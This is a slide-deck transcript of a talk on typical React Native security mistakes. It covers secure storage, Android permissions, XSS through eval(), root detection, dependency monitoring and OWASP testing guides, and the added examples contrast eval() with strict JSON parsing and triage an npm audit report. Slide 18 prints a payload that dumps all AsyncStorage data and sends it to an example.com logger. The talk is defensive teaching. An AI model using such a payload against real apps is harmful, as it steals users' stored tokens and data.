Slide 1

Slide 1 text

Julia Potapenko
React Native Security: Addressing Typical Mistakes
Let's shed light on React Native apps’ security and explain some risks and threats developers should address to prevent typical mistakes.
@julepka cossacklabs.com

Slide 2

Slide 2 text

Julia Potapenko
About me 👩💻
Security Software Engineer at Cossack Labs
Leader of OWASP Zhytomyr Chapter, Ukraine 🇺🇦
❤︎ OWASP MASVS/MSTG Project
@julepka cossacklabs.com
We help companies to protect their sensitive and valuable data.

Slide 3

Slide 3 text

We will talk about:
- Architecture
- Platforms usage
- Dependencies
- Security testing

Slide 4

Slide 4 text

“Choosing React Native and its components means that you understand and accept potential security consequences.”

Slide 5

Slide 5 text

Architecture basics
React Native is a cross-platform solution from Facebook that allows writing native apps using React (JavaScript or TypeScript).

Slide 6

Slide 6 text

Trusting third parties
Native platforms = Apple and Google
React Native = Facebook
TypeScript = Microsoft


Slide 8

Slide 8 text

Trusting third parties
Native platforms = Apple and Google
React Native = Facebook
TypeScript = Microsoft
CVE-2020-1911, CVE-2020-1912, CVE-2020-1913

Slide 9

Slide 9 text

“With React Native, developers deal with security for all three platforms: iOS, Android and React Native.”

Slide 10

Slide 10 text

OWASP Mobile Top 10 #1: Improper Platform Usage

Slide 11

Slide 11 text

React Native is a leaky abstraction (@vixentael)

Slide 12

Slide 12 text

Secure Store Example

                                   iOS (Keychain)     Android (SharedPreferences + KeyStore)
Data stored encrypted              Yes                Yes

Slide 13

Slide 13 text

Secure Store Example

                                   iOS (Keychain)                    Android (SharedPreferences + KeyStore)
Data stored encrypted              Yes                               Yes
Data persists across app reinstalls  Yes                             No
Hardware-backed encryption         Yes                               Depends on device vendor
Data decrypted only before usage   Decrypted when device unlocked    Yes

Slide 14

Slide 14 text

Managing Android Permissions

Slide 15

Slide 15 text

Managing Android Permissions
Android: you can add permissions in multiple files
+ React Native: it is common practice to use third-party solutions

Slide 16

Slide 16 text

Managing Android Permissions
Android: you can add permissions in multiple files
+ React Native: it is common practice to use third-party solutions
= 💥🤯💥
“I don’t need this permission.” “The app crashes if I delete it.”

Slide 17

Slide 17 text

Is XSS possible?
XSS possibility is decreased by design.

Slide 18

Slide 18 text

Is XSS possible?
XSS possibility is decreased by design. XSS is still possible.
eval()

    _reactNative.AsyncStorage.getAllKeys(function(err, result) { _reactNative.AsyncStorage.multiGet(result, function(err, result) { fetch('http://example.com/logger.php?token=' + JSON.stringify(result)); }); });

Steal all the data from local storage (AsyncStorage) by exploiting eval-based injection and accessing React Native APIs.
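The slide shows what an injected string can do once it reaches eval(). The following is an added example, not code from the talk: it places an eval-based "settings loader" (the vulnerable pattern) next to a hardened loader that parses the same input strictly as JSON and allow-lists keys and types. AsyncStorage is a constructed in-memory stand-in so the file runs in plain Node, the payload strings are constructed samples, and the function names are assumptions for illustration.

```javascript
// Added example (not from the talk). AsyncStorage below is a constructed
// in-memory stand-in for the React Native module; it records which of its
// methods an evaluated payload reached, standing in for the fetch() on the slide.
const accessLog = [];
const AsyncStorage = {
  _data: { session_token: 'constructed-sample-token', theme: 'dark' },
  getAllKeys() { accessLog.push('getAllKeys'); return Object.keys(this._data); },
  multiGet(keys) { accessLog.push('multiGet'); return keys.map((k) => [k, this._data[k]]); },
};

// VULNERABLE: treats a server- or deep-link-supplied string as JavaScript.
// The code inside it runs with the module's scope, so React Native APIs such
// as AsyncStorage are one identifier away, exactly as on the slide.
function loadSettingsUnsafe(payload) {
  return eval('(' + payload + ')');
}

// HARDENED: parse strictly as JSON data, then allow-list keys and value types.
// Data never becomes code; unexpected keys are rejected instead of stored.
const SETTINGS_SCHEMA = { theme: 'string', fontScale: 'number' };

function loadSettingsSafe(payload) {
  let parsed;
  try {
    parsed = JSON.parse(payload);
  } catch (e) {
    throw new Error('settings: payload is not valid JSON');
  }
  if (parsed === null || typeof parsed !== 'object' || Array.isArray(parsed)) {
    throw new Error('settings: expected a JSON object');
  }
  const settings = {};
  for (const [key, value] of Object.entries(parsed)) {
    const expected = SETTINGS_SCHEMA[key];
    if (expected === undefined) throw new Error(`settings: unexpected key "${key}"`);
    if (typeof value !== expected) throw new Error(`settings: "${key}" must be ${expected}`);
    settings[key] = value;
  }
  return settings;
}

// Constructed payloads. The hostile one is valid JavaScript but not valid JSON:
// it reaches AsyncStorage through eval() and is rejected by JSON.parse.
const BENIGN_PAYLOAD = '{"theme":"dark","fontScale":1.2}';
const HOSTILE_PAYLOAD = 'AsyncStorage.multiGet(AsyncStorage.getAllKeys())';

// True when the hardened loader refuses the payload.
function isRejectedBySafeParser(payload) {
  try { loadSettingsSafe(payload); return false; } catch (e) { return true; }
}

console.log('safe loader, benign payload:', loadSettingsSafe(BENIGN_PAYLOAD));
console.log('safe loader rejects hostile payload:', isRejectedBySafeParser(HOSTILE_PAYLOAD));
console.log('eval reached storage APIs:', loadSettingsUnsafe(HOSTILE_PAYLOAD).length > 0, accessLog);
```

The point of the comparison is that the safe loader has no code path in which the input is executed: JSON.parse either yields data or throws, and the schema check rejects any key the app does not expect, so an injected value can neither run nor quietly survive in stored settings.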

Slide 19

Slide 19 text

Jailbreak and Root detection
It is never easy for regular iOS and Android teams.

Slide 20

Slide 20 text

Jailbreak and Root detection
It is never easy for regular iOS and Android teams.
There are no ready-to-go React Native solutions:
a. implement on your own
b. use third-party solutions for each platform and write bridging code

Slide 21

Slide 21 text

Jailbreak and Root detection
It is never easy for regular iOS and Android teams.
There are no ready-to-go React Native solutions:
a. implement on your own
b. use third-party solutions for each platform and write bridging code
Example: IOSSecuritySuite https://github.com/securing/IOSSecuritySuite
Swift ➤ Objective-C ➤ React Native

Slide 22

Slide 22 text

“50 shades of dependencies”

Slide 23

Slide 23 text

A typical situation

Slide 24

Slide 24 text

A typical situation
They’ve updated dependencies half a year later…

Slide 25

Slide 25 text

Monitoring dependencies 🤯
- So many dependencies
- Additional CI work
- One update triggers another update
- Integrating dependency checkers
- Updates may be incompatible
- What if there is no fix for a vulnerability?
- Architectural changes required
- Tight deadlines

Slide 26

Slide 26 text

What if there is no fix?
✅ Learn more about the issue and its scope
✅ Document it, make the team aware
✅ Monitor it and book the time for the update
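The two slides above (monitoring dependencies, and what to do when there is no fix) describe a triage policy rather than a tool. As an added example, not from the talk, the script below applies that policy to an `npm audit --json` report: findings with a straightforward fix go to an update list, fixes that drag in a semver-major bump of another package go to a planning list (the "one update triggers another update" case), and findings with no fix are turned into risk-register entries with a review date instead of being ignored. The report is a constructed sample in the npm 7+ report shape (auditReportVersion 2); package names, versions and the function names are made up for illustration.

```javascript
// Added example (not from the talk). SAMPLE_AUDIT_REPORT is a constructed
// stand-in for the output of `npm audit --json` on npm 7+; every package name
// and version in it is made up.
const SAMPLE_AUDIT_REPORT = {
  auditReportVersion: 2,
  vulnerabilities: {
    'example-image-lib': {
      name: 'example-image-lib', severity: 'high', isDirect: true, range: '<2.4.0',
      fixAvailable: { name: 'example-image-lib', version: '2.4.0', isSemVerMajor: false },
    },
    'example-bridge-util': {
      name: 'example-bridge-util', severity: 'moderate', isDirect: false, range: '*',
      fixAvailable: false, // no upstream fix at all
    },
    'example-old-storage': {
      name: 'example-old-storage', severity: 'critical', isDirect: true, range: '<=1.0.5',
      // the fix is only reachable by a semver-major bump of a different package
      fixAvailable: { name: 'example-rn-fork', version: '2.0.0', isSemVerMajor: true },
    },
  },
};

const SEVERITY_RANK = { info: 0, low: 1, moderate: 2, high: 3, critical: 4 };

// Splits findings at or above minSeverity into three buckets:
//   update - a fix exists and is a plain bump of the affected package
//   plan   - the fix needs a semver-major bump or a bump of another package
//   noFix  - no fix is available; must be documented and monitored
function triageAudit(report, minSeverity = 'moderate') {
  const threshold = SEVERITY_RANK[minSeverity];
  const result = { update: [], plan: [], noFix: [] };
  for (const v of Object.values(report.vulnerabilities || {})) {
    if ((SEVERITY_RANK[v.severity] || 0) < threshold) continue;
    const entry = { name: v.name, severity: v.severity, direct: v.isDirect, range: v.range };
    if (v.fixAvailable === false) {
      result.noFix.push(entry);
    } else if (v.fixAvailable === true) {
      result.update.push(entry);
    } else if (v.fixAvailable.isSemVerMajor || v.fixAvailable.name !== v.name) {
      result.plan.push({ ...entry, via: `${v.fixAvailable.name}@${v.fixAvailable.version}` });
    } else {
      result.update.push({ ...entry, to: v.fixAvailable.version });
    }
  }
  return result;
}

// Turns the no-fix bucket into risk-register entries: the issue is documented,
// the team is made aware, and a review date books the time for the update.
function riskRegisterEntries(triage, reviewBy) {
  return triage.noFix.map((f) => ({
    package: f.name,
    severity: f.severity,
    status: 'accepted-temporarily',
    reviewBy,
    note: 'no upstream fix; scope assessed, advisory monitored',
  }));
}

// CI exit status: actionable findings (update or plan) fail the build,
// documented no-fix findings are reported but do not block it.
function ciVerdict(triage) {
  return triage.update.length === 0 && triage.plan.length === 0 ? 0 : 1;
}

const triage = triageAudit(SAMPLE_AUDIT_REPORT);
console.log(JSON.stringify(triage, null, 2));
console.log(JSON.stringify(riskRegisterEntries(triage, '2021-01-01'), null, 2));
console.log('CI exit status:', ciVerdict(triage));
```

The threshold parameter is what keeps the "additional CI work" bounded: a team can start by blocking on high and critical only, and lower the bar once the planning bucket has been worked down. The register entries are plain objects so they can be written to whatever tracker the team already uses.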

Slide 27

Slide 27 text

Plan time carefully!
➡ iOS or Android update
➡ React Native update
➡ Forked version update
➡ Dependencies update
➡ Mobile app source code update

Slide 28

Slide 28 text

Security testing of React Native apps

Slide 29

Slide 29 text

OWASP MASVS: Mobile Application Security Verification Standard https://github.com/OWASP/owasp-masvs
OWASP MSTG: Mobile Security Testing Guide https://github.com/OWASP/owasp-mstg

Slide 30

Slide 30 text

OWASP MASVS: Mobile Application Security Verification Standard https://github.com/OWASP/owasp-masvs
OWASP MSTG: Mobile Security Testing Guide https://github.com/OWASP/owasp-mstg
“Please note that the MSTG focuses primarily on native apps. These are apps built with Java or Kotlin using the Android SDK for Android or built with Swift or Objective-C using the Apple SDKs for iOS. Apps using frameworks such as Nativescript, React-native, Xamarin, Cordova, etc. are not within the main focus of the MSTG. However, some essential controls, such as certificate pinning, have been explained already for some of these platforms.”

Slide 31

Slide 31 text

You can still use MASVS!
OWASP MASVS is language agnostic. All requirements are relevant for React Native apps because they are “native” under the hood.

Slide 32

Slide 32 text

You can still use MSTG!
General ideas will be similar. You either look for a similar JavaScript implementation or for native code with bridging functions.

Slide 33

Slide 33 text

How do we test RN app security?
1. Use MASVS requirements.
2. Review JavaScript dependencies’ source code to understand the native controls behind it. You need to be able to read all the languages: JavaScript (TypeScript), Objective-C (Swift), Java (Kotlin).
3. Use ASVS and WSTG to cover JavaScript-specific vulnerabilities like XSS.

Slide 34

Slide 34 text

Final thoughts…
“Learn once, write anywhere.”

Slide 35

Slide 35 text

Final thoughts…
“Learn once, write anywhere.”
“Learn once, ask mobile security people for help.”

Slide 36

Slide 36 text

Where to go next?
- My React Native Security Article: https://www.cossacklabs.com/blog/react-native-app-security.html
- React Native Security Guide: https://reactnative.dev/docs/security
- OWASP MASVS Hybrid Apps discussion: https://github.com/OWASP/owasp-masvs/discussions/557

Slide 37

Slide 37 text

Thank you! @julepka